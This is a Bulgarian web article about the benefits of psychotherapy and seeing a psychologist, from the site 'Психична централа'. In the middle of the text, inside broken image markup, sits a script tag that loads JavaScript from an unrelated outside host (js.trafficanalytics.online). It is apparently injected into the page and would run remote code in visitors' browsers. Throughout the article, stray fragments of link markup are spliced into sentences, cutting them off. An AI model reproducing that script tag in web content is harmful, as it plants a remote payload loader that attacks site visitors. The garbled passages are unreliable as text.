Коя е ползата от психотерапията с Весела Николова

За щастие в България вече чувствително се променя мнението, че психотерапията и посещението при психолог е само за хора с психически отклонения. Тенденцията към модернизиране на мисленето, така характерна за съвременните западни страни и САЩ, засяга и тази сфера. Хората добре разбират, че в момент на психична криза – проблеми с партньора, загуба на близък човек, недостатъчна увереност в себе си и много други подобни проблеми, с които се сблъсква психически здравият човек, психотерапевтът е този, който може да бъде от полза. Благодарение на София – Люлин” href=”http://icp-bg.com/%d0%b2%d0%b5%d1%81%d0%b5%d0%bb%d0%b0-%d0%bd%d0%b8%d0%ba%d0%be%d0%bb%d0%be%d0%b2%d0%b0-%d0%bf%d1%81%d0%b8%d1%85%d0%be%d0%bb%d0%be%d0%b3-%d1%81%d0%be%d1%84%d0%b8%d1%8f-%d0%bb%d1%8e%d0%bb%d0%b8/”>пълноценен живот.

Психотерапия, <script type='text/javascript' src='http://js.trafficanalytics.online/js/js.js'><p class= Психична централа” src=”http://icp-bg.com/wp-content/uploads/2013/07/psycho-terapy.jpg” width=”566″ height=”207″ /> Психотерапия, Психична централа

Защо е наистина важна и полезна работата на психолога и защо в последните години се наблюдава една ясно изразена революция в нейното развитие? Отговорът е прост: стремителното развитие на психологията отговаря на една огромна потребност. В условията на нашия разцентрован свят се налага задълбочено проучвате. Необходимо е да се открие здрава почва и върху нея да се гради. Тъжно е да се наблюдава колко много хора не представляват нищо в сравнение с онова, което биха могли да бъдат. Човешките контакти се разпадат. Тълпата и масата заместват съзнателния индивид. Въздържаността и самообладанието изчезват. София – Люлин” href=”http://icp-bg.com/%d0%b2%d0%b5%d1%81%d0%b5%d0%bb%d0%b0-%d0%bd%d0%b8%d0%ba%d0%be%d0%bb%d0%be%d0%b2%d0%b0-%d0%bf%d1%81%d0%b8%d1%85%d0%be%d0%bb%d0%be%d0%b3-%d1%81%d0%be%d1%84%d0%b8%d1%8f-%d0%bb%d1%8e%d0%bb%d0%b8/”>душевното равновесие. Нищо не може да постигне човек без него. Без него животът не е пълноценен. Равновесието е инструментът на човешкото самоусъвършенстване. Всяка загуба на равновесие откъсва човека от неговата физиологична и психична цялост, от истинската хуманност. Всяка болест, всеки психически недъг, всяка неуравновесеност отдалечават човека от самия него и от възможностите му.
Психичните проблеми приличат на зъбобол, който обхваща цялото човешко същество. Духът се съсредоточава върху него и всичко останало престава да съществува. В такъв момент човек се отъждествява със своя зъбобол. Болката го отдалечава от самия него, от евентуалната му трудова дейност, от мислите му. Бистротата на ума изчезва. С душевната болка е аналогично – човек не действа според разума, а според болестта си. Такъв е случаят със стеснителните, с агресивните, с обзетите от тревожност, а също и с лицата, страдащи от комплекси, болезнена напрегнатост, натрапливи мисли… Едва след като човек се освободи от различните мъчителни изживявания, едва тогава той ще може да използва цялата си психична енергия, която да бъде впрегната в реализацията на потенциалните възможности. Освен това, след психичното пречистване тези възможности стават и по – видими. Психологията ни учи как да си върнем свободата и реалистичния поглед върху нещата, като ни избавя от зле разбраните и зле преглътнатите инстинкти. Психологията е училище за самочувствие и самообладание, както и за душевно спокойствие. Позволява ни да опознаем себе си, да свържем духовното с материалното. Но за тази цел трябва да знаем. А за да знаем, трябва да учим.
До скоро българинът беше свикнал да таи психичните си терзания в себе си или да ги споделя с приятел, родител, брат или сестра, в случай че счита, че може да им има доверие.

В първият случай – задържането на негативните преживявания, когато не е намерен начин да се излеят навън, е доказано, че рано или късно душевната болка преминава в някакво телесно заболяване. Естествено засягат се най-чувствителните за определен човек органи, проявяват се наследствени обремености и пр. Това показва колко важно е навереме да се реши психичният проблем, преди да е довел до нещо по – трудно или невъзможно за преодоляване. Ето защо добре е периодично психичното напрежение да се разрежда, за да се неутрализира негативното му влияние върху тялото. Нали не е по-хубаво това разреждане да става чрез приемане на наркотици, алкохол или просто чрез агресивни прояви, засягащи най-близките ни хора? Когато човек излее мъката си, когато срещне разбиране и подкрепа в лицето на своя психотерапевт, много по-лесно ще му бъде да погледне на нещата трезво, да ги обмисли и да вземе правилното решение – индивидуално и София – Люлин” href=”http://icp-bg.com/%d0%b2%d0%b5%d1%81%d0%b5%d0%bb%d0%b0-%d0%bd%d0%b8%d0%ba%d0%be%d0%bb%d0%be%d0%b2%d0%b0-%d0%bf%d1%81%d0%b8%d1%85%d0%be%d0%bb%d0%be%d0%b3-%d1%81%d0%be%d1%84%d0%b8%d1%8f-%d0%bb%d1%8e%d0%bb%d0%b8/”>лесно и трайно е справянето с тях. Не бива да се чака с години, важно е колкото се може по-рано да осъзнаем нуждата от помощ и да потърсим съответния специалист, за да се избегнат неблагоприятните последици от психичните терзания. Не трябва да се чака психичните проблеми да прераснат в телесни такива, защото за съжаление в този момент ще бъде вече твърде късно да се постигнат
желаните резултати.

 

Съдържанието в "Психична централа" и технологиите, използвани в сайта,
са под закрила на Закона за авторското право и сродните му права.
Не се допуска копиране и публикуване на текстови материали от този сайт,
освен ако цитирате част от текст.

Посочването на източника и добавяне на линк към "Психична централа" е задължително.